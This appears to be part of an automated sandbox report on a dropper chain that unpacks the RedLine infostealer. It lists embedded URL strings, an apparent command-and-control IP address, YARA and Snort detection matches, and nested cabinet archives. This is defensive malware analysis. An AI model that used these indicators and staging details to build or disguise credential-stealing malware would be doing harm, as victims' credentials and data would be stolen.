                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000032B3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                            Source: b7687179.exe, 00000006.00000002.426987259.0000000003522000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000032AB000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                            Source: b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id40
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000032B3000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                            Source: b7687179.exe, 00000006.00000002.426987259.00000000032B3000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.00000000031D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                            Source: qu0t4ukLoN.exe, 00000000.00000003.356607577.00000000031D5000.00000004.00000020.00020000.00000000.sdmp, qu0t4ukLoN.exe, 00000000.00000003.356501749.0000000004FC4000.00000004.00000020.00020000.00000000.sdmp, v6434086.exe, 00000002.00000003.358780202.0000000004C12000.00000004.00000020.00020000.00000000.sdmp, d4851931.exe.0.dr, a4758283.exe.2.drString found in binary or memory: http://www.digicert.com/CPS0
                            Source: b7687179.exe, 00000006.00000002.434854527.0000000004204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                            Source: v6434086.exe, 00000002.00000003.358780202.0000000004C12000.00000004.00000020.00020000.00000000.sdmp, b7687179.exe, 00000006.00000000.361157707.0000000000E82000.00000002.00000001.01000000.00000008.sdmp, b7687179.exe, 00000006.00000002.426987259.000000000325F000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe.2.drString found in binary or memory: https://api.ip.sb/ip
                            Source: b7687179.exe, 00000006.00000002.434854527.0000000004204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                            Source: b7687179.exe, 00000006.00000002.434854527.0000000004204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                            Source: b7687179.exe, 00000006.00000002.434854527.0000000004375000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.00000000043F3000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.00000000042DA000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.00000000032DF000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.0000000003488000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.00000000042F7000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004453000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.00000000043D6000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000003.422839734.0000000004482000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.00000000033FB000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004470000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.000000000336E000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.0000000003515000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004273000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004358000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000003.422839734.000000000449F000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                            Source: b7687179.exe, 00000006.00000002.434854527.0000000004204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                            Source: b7687179.exe, 00000006.00000002.434854527.0000000004375000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.00000000043F3000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.00000000042DA000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.00000000032DF000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.0000000003488000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.00000000042F7000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004453000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.00000000043D6000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000003.422839734.0000000004482000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.00000000033FB000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004470000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.000000000336E000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.0000000003515000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004273000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004358000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000003.422839734.000000000449F000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                            Source: b7687179.exe, 00000006.00000002.434854527.0000000004375000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.00000000043F3000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.00000000042DA000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.00000000032DF000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.0000000003488000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.00000000042F7000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004453000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.00000000043D6000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000003.422839734.0000000004482000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.00000000033FB000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004470000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.000000000336E000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.0000000003515000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004273000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004358000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000003.422839734.000000000449F000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                            Source: b7687179.exe, 00000006.00000002.434854527.0000000004375000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.00000000043F3000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.00000000042F7000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004470000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000003.422839734.000000000449F000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                            Source: b7687179.exe, 00000006.00000002.434854527.0000000004375000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.00000000043F3000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.00000000042DA000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.00000000032DF000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.0000000003488000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.00000000042F7000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004453000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.00000000043D6000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000003.422839734.0000000004482000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.00000000033FB000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004470000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.000000000336E000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.0000000003515000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004273000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004358000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000003.422839734.000000000449F000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
                            Source: b7687179.exe, 00000006.00000002.434854527.0000000004375000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.00000000043F3000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.00000000042DA000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.00000000032DF000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.0000000003488000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.00000000042F7000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004453000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.00000000043D6000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000003.422839734.0000000004482000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.00000000033FB000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004470000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.000000000336E000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.426987259.0000000003515000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004273000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004358000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000003.422839734.000000000449F000.00000004.00000800.00020000.00000000.sdmp, b7687179.exe, 00000006.00000002.434854527.0000000004204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                            Source: unknownTCP traffic detected without corresponding DNS query: 83.97.73.122
                            Source: a4758283.exe, 00000003.00000002.361052449.00000000004DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                            System Summary

                            Source: 2.3.v6434086.exe.4c3f81e.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 2.3.v6434086.exe.4c3f81e.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: 6.0.b7687179.exe.e80000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe, type: DROPPEDMatched rule: Detects RedLine infostealer Author: ditekSHen
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeCode function: 0_2_00A93BA20_2_00A93BA2
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeCode function: 0_2_00A95C9E0_2_00A95C9E
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exeCode function: 1_2_00213BA21_2_00213BA2
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exeCode function: 1_2_00215C9E1_2_00215C9E
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exeCode function: 2_2_00BC3BA22_2_00BC3BA2
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exeCode function: 2_2_00BC5C9E2_2_00BC5C9E
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: 3_2_004068A03_2_004068A0
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: 3_2_004051323_2_00405132
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: 3_2_004059DB3_2_004059DB
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: 3_2_004151A93_2_004151A9
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: 3_2_004062073_2_00406207
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: 3_2_0040DBBF3_2_0040DBBF
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: 3_2_00414C653_2_00414C65
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: 3_2_00415DE53_2_00415DE5
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: 3_2_00405DE73_2_00405DE7
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: 3_2_004056073_2_00405607
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: 3_2_004156ED3_2_004156ED
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: 3_2_00416E913_2_00416E91
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exeCode function: 6_2_017BF3886_2_017BF388
                            Source: qu0t4ukLoN.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            Source: 2.3.v6434086.exe.4c3f81e.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 2.3.v6434086.exe.4c3f81e.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 6.0.b7687179.exe.e80000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\b7687179.exe, type: DROPPEDMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: C:\Users\user\Desktop\qu0t4ukLoN.exeCode function: 0_2_00A91F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,0_2_00A91F90
                            Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\v7020033.exeCode function: 1_2_00211F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,1_2_00211F90
                            Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\v6434086.exeCode function: 2_2_00BC1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,2_2_00BC1F90
                            Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\a4758283.exeCode function: String function: 0040D294 appears 48 times
                            Source: qu0t4ukLoN.exeStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 635732 bytes, 2 files, at 0x2c +A "v7020033.exe" +A "d4851931.exe", ID 1672, number 1, 24 datablocks, 0x1503 compression
                            Source: v7020033.exe.0.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 310750 bytes, 2 files, at 0x2c +A "v6434086.exe" +A "c6803120.exe", ID 1676, number 1, 16 datablocks, 0x1503 compression
                            Source: v6434086.exe.1.drStatic PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, many, 135234 bytes, 2 files, at 0x2c +A "a4758283.exe" +A "b7687179.exe", ID 1685, number 1, 11 datablocks, 0x1503 compression
                            Source: v6434086.exe.1.drStatic PE information: Resource name: RT_RCDATA type: x86 executable not stripped
